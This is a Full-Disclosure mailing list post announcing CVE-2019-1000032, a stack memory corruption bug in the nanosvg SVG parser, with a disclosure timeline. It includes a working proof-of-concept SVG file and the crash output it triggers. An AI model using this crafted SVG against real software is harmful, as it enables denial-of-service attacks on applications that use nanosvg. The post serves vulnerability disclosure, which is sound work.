lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 24 Feb 2019 18:37:01 +0100
From: Sebastian Neef <>
Subject: [FD] CVE-2019-1000032: Memory corruption / DoS in nanosvg

The SVG library nanosvg [0] suffers from a memory corruption bug that can lead to at least DoS. 

The bug exists in the `nsvg__parseColorRGB` function, which can be reached by parsing a malicious SVG file through `nsvgParseFromFile`  or `nsvgParse`. This should also affect libraries/packages that provide bindings to nanosvg, for example:

- Lua:
- Python:
- Java:
- Rust:

More information available in the issue [1] and the blogpost [2].

# PoC 

> <svg>
> 	<circle fill="rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)"/>
> </svg>

> $> ./test poc.svg
> *** stack smashing detected ***: <unknown> terminated
> fish: “./test poc.svg” terminated by signal SIGABRT (Abort)

# Timeline 
- Late 2018 bug discovered by Sebastian Neef using AFL
- 16th Nov 2018 opened issue [1]
- 19th Feb 2019 CVE assigned by DWF
- 24th Feb 2019 blogpost [2] and email published


Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists